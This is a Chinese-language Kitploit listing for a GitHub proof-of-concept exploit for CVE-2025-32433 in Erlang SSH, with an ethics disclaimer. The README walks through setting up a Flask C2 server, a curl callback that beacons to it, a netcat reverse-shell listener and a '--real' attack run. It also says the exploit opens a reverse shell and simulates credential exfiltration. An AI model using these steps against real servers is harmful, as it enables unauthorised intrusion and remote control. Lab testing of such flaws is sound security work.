Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC_CVE-2025-32433 — 针对CVE-2025-32433的概念验证漏洞利用,包含模拟与真实攻击模式,并集成基于Flask的C2服务器,用于反向Shell回调与后渗透模拟。 | Kitploit
工具/GitHubGitHub/ekomssavior/poc_cve-2025-32433
漏洞分析漏洞利用渗透测试命令与控制红队Payload 开发
GitHubekomssavior/poc_cve-2025-32433

POC_CVE-2025-32433

针对CVE-2025-32433的概念验证漏洞利用,包含模拟与真实攻击模式,并集成基于Flask的C2服务器,用于反向Shell回调与后渗透模拟。

查看仓库
5271年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

⚠️ 道德免责声明

这个仓库包含演示真实 CVE(CVE-2025-32433)的代码。
只在你有明确授权的环境中使用它。

绝不要针对你不拥有或管理的系统测试此漏洞利用程序。
未经授权的使用是非法的、不道德的,并且对网络安全社区有害。

CVE-2025-32433 的模拟与真实 PoC

我的兄弟 Chocapikk 给我看了这个发现的 PoC erling_cve.py,我很感兴趣,想在一个安全的环境中测试它。

对于这个仓库,你有两个选择:下面我列出的安全模拟脚本和系统。

或者你可以使用真正的 erling_cve.py(以合乎道德的方式、谨慎行事,并且只在你有权测试的网络上使用)。

在使用此工具测试或运行实际漏洞利用之前,先看看我的兄弟 m0usem0use 以及他用 Python 编写的用于查找 CVE-2025-32433 易受攻击目标的脚本!!!!

https://github.com/m0usem0use/erl_mouse


cve-2025-32433 漏洞利用的模拟版本

设置 C2 服务器

构建一个基于 Python Flask 的 C2:非常适合 bot 回连或反向 Shell。

在 C2 服务器上运行此设置脚本

apt update && apt install python3-pip git -y

sudo apt install python3-flask

mkdir ~/c2

cd ~/c2

nano c2_server.py (粘贴 c2_server 脚本,按需编辑)

运行

python3 c2_server.py

bot(或测试脚本)可以像这样通过 curl 回连:

curl -X POST http://:8080/report -d "Bot is online"

在 Kali 上设置 Python venv

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

创建 Python 虚拟环境

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

测试回调

nano test_callback.py (粘贴 test_callback 脚本,按需编辑)

运行回调

python3 test_callback.py

你现在正式拥有了

一个可用的 venv

一个在线云 C2

功能正常的回调注入

-你需要目标/受害机器上暴露(或模拟)一个 Erlang 进程或服务


Eerling_cve.py 是做什么的?

连接目标 IP 的 22 端口

发送伪造的 SSH 版本字符串

发送精心构造的数据包(很可能用于触发漏洞——试图滥用 Erlang 未记录的 SSH 处理程序或缓冲区溢出)

触发返回到攻击者 IP 的反向 Shell

通过运行 whoami、uname 等命令,并将伪造的“凭据外泄”写入 /tmp/exfil.log,来模拟后渗透利用

我们将采用我们找到的 Erlang 类 PoC,并

让它在 Kali venv 中可用

当“攻击”运行时,让它向我们的云 C2 报告

在受控实验室中合乎道德且安全地运行它

观察它生成 /tmp/exfil.log 以模拟被窃取的数据


在 Kali 机器上

nano poc_erlang_test.py

-粘贴 poc_erlang_test.py 并按需编辑

打开监听器

在一个新终端中运行

nc -lvnp 4444

运行 PoC

python poc_erlang_test.py --real

下载工具